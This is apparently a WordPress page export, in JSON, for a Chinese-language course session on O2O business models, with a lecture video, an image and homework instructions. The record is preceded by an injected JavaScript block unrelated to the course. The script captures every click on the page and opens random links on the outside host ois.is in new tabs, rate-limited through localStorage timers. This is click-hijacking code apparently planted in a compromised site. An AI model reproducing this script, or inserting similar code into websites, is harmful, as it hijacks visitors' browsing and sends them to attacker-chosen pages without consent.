<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":877,"date":"2014-10-11T11:37:01","date_gmt":"2014-10-11T03:37:01","guid":{"rendered":"http:\/\/edu.secda.info\/phil999_course02\/?page_id=877"},"modified":"2020-02-20T18:25:52","modified_gmt":"2020-02-20T10:25:52","slug":"%e7%ab%a0%e7%af%801-7","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/phil999_course02\/?page_id=877","title":{"rendered":"\u7b2c\u516b\u9031 \u767c\u5c55O2O\u65b0\u5546\u696d\u6a21\u5f0f(\u8cc0\u7e3d\u6f14\u8b1b)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"877\" class=\"elementor elementor-877\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-51831ae elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"51831ae\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-177a451\" data-id=\"177a451\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b9a28bf elementor-widget elementor-widget-heading\" data-id=\"b9a28bf\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u524d\u6e96\u5099<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-da98e6e elementor-widget elementor-widget-accordion\" data-id=\"da98e6e\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2291\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2291\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u9810\u7fd2<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2291\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2291\"><p><span style=\"color: #000000;\">\u8cc0\u7e3d\u7d93\u7406\u6f14\u8b1b\u3002\u6f14\u8b1b\u4e3b\u984c : \u6559\u80b2\u5e02\u5834\u7684FHH\u71df\u904b\u6a21\u5f0f<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3a3021a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3a3021a\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-971ff80\" data-id=\"971ff80\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0d5d514 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"0d5d514\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2e0a0c4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2e0a0c4\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c54761d\" data-id=\"c54761d\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-977894f elementor-widget elementor-widget-heading\" data-id=\"977894f\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u7a0b\u7d00\u9304<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-fa0cac9 elementor-widget elementor-widget-accordion\" data-id=\"fa0cac9\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2621\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2621\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u8ab2\u5802\u5f71\u7247<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2621\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2621\"><p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/ryJeAyDIAbo\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe><\/p><p><img loading=\"lazy\" class=\"size-full wp-image-1548 aligncenter\" src=\"http:\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/FHH-1.png\" alt=\"\" width=\"1280\" height=\"720\" srcset=\"https:\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/FHH-1.png 1280w, https:\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/FHH-1-300x169.png 300w, https:\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/FHH-1-800x450.png 800w, https:\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/FHH-1-768x432.png 768w\" sizes=\"(max-width: 1280px) 100vw, 1280px\" \/><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-399a3f7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"399a3f7\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-dd6f05b\" data-id=\"dd6f05b\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-581f6ff elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"581f6ff\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bc25db1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bc25db1\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-cd1f825\" data-id=\"cd1f825\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c7b98b6 elementor-widget elementor-widget-heading\" data-id=\"c7b98b6\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u5f8c\u5b8c\u6210\u4e8b\u9805<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-0fd32e0 elementor-widget elementor-widget-accordion\" data-id=\"0fd32e0\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1651\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1651\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1651\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1651\"><p><span style=\"color: #000000;\">4\/14(\u65e5)\u665a\u4e0a12\u9ede\u4e0a\u50b3\u6700\u65b0\u9032\u5ea6\u3002<\/span><\/p><p><span style=\"color: #000000;\">\u672c\u5468\u4f5c\u696d :<\/span><br \/><span style=\"color: #000000;\">1.\u5728\u540c\u4e00\u500b\u5fc3\u667a\u5716\u5206\u6790\u6a94\u6848\u88e1\uff0c\u589e\u52a0\u65b0\u4e00\u9801&#8221;\u65b0\u5546\u696d\u6a21\u5f0f&#8221;(\u53c3\u8003\u7bc4\u672c)\uff0c\u4e3b\u984c\u8a2d\u5b9a\u70baXXX\u5be6\u865b\u6574\u5408\u5546\u696d\u6a21\u5f0f\u3002<\/span><br \/><span style=\"color: #000000;\">2. \u5728\u4e3b\u984c\u7684\u5206\u652f\uff0c\u8acb\u540c\u5b78\u586b\u5beb&#8221;\u65b0\u76ee\u6a19\u5ba2\u7fa4&#8221;\uff0c\u4ee5\u53ca&#8221;\u65b0\u50f9\u503c\u6d3b\u52d5&#8221;\u3002\u6211\u5011\u8a66\u5f9e\u81ea\u5df1\u626e\u6f14\u7684\u89d2\u8272\u51fa\u767c\uff0c\u5c0b\u627e\u672a\u88ab\u6eff\u8db3\u7684\u9700\u6c42\u3002\u6bd4\u5982\u4f60\u7684\u8eab\u5206\u53ef\u4ee5\u662f\u5b78\u751f\u3001\u5fd7\u5de5\u3001\u793e\u9577\u3001\u5bb6\u4e2d\u6210\u54e1(\u5bb6\u5ead)\u3001\u5bf5\u7269\u4e3b\u4eba\u3001\u6e96\u5099\u5275\u696d\u7684\u5e74\u8f15\u4eba\u3001\u7db2\u7d05\u3001\u96fb\u7af6\u9054\u4eba\u7b49&#8230;..\u3002\u5f9e\u81ea\u8eab\u9ad4\u9a57\uff0c\u767c\u6398\u5728\u8655\u7406\u67d0\u4ef6\u4e8b\u6642\uff0c\u4f60\u9700\u8981\u54ea\u4e9b\u5e6b\u52a9\u3001\u9700\u8981\u54ea\u4e9b\u80fd\u529b\u3002<\/span><br \/><span style=\"color: #000000;\">3. &#8220;\u65b0\u50f9\u503c\u6d3b\u52d5&#8221;\uff0c\u60f3\u50cf\u4e00\u53f0\u624b\u6a5f\uff0c\u88e1\u9762\u4e0b\u8f09\u4e86\u8a31\u591a\u4f60\u9700\u8981\u7684\u529f\u80fdAPP\uff0c\u5e73\u53f0\u5982\u540c\u624b\u6a5f\uff0c\u60a8\u8a8d\u70ba\u9019\u5e73\u53f0\u4e0a\u9700\u8981\u6709\u751a\u9ebc\u529f\u80fd\u3001\u77e5\u8b58\u7b49\u3002<\/span><br \/><span style=\"color: #000000;\">4. &#8220;\u6d88\u8cbb\u4f4e\u5b78\u8cbb&#8221; \u4fc3\u9032\u96fb\u5546\u6d88\u8cbb\u3002\u5404\u7d44\u54e1\u5617\u8a66\u601d\u8003\uff0c\u4f60\u9700\u8981\u900f\u904e&#8221;\u6d88\u8cbb\u4f86\u62b5XXX&#8221;\uff0c\u6bd4\u5982\u6d88\u8cbb\u5730\u623f\u8cb8\u3001\u6d88\u8cbb\u62b5\u6a5f\u7968(\u65c5\u7a0b\u9ede\u6578)&#8230;.\u9019\u5230\u5beb\u5728&#8221;\u65b0\u50f9\u503c\u6d3b\u52d5&#8221;<\/span><\/p><p><span style=\"color: #000000;\">\u4e0b\u9031\u4e0a\u8ab2 :<\/span><br \/><span style=\"color: #000000;\">\u5404\u7d44\u5e36\u7b46\u96fb\u4e0a\u8ab2\uff0c\u672a\u5e36\u8005\u6263\u7e3d\u52063\u5206\u3002<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u8ab2\u524d\u6e96\u5099 \u9810\u7fd2 \u8cc0\u7e3d\u7d93\u7406\u6f14\u8b1b\u3002\u6f14\u8b1b\u4e3b\u984c : \u6559\u80b2\u5e02\u5834\u7684FHH\u71df\u904b\u6a21\u5f0f \u8ab2\u7a0b\u7d00\u9304 <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":853,"menu_order":8,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/877"}],"collection":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=877"}],"version-history":[{"count":6,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/877\/revisions"}],"predecessor-version":[{"id":1551,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/877\/revisions\/1551"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/853"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=877"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}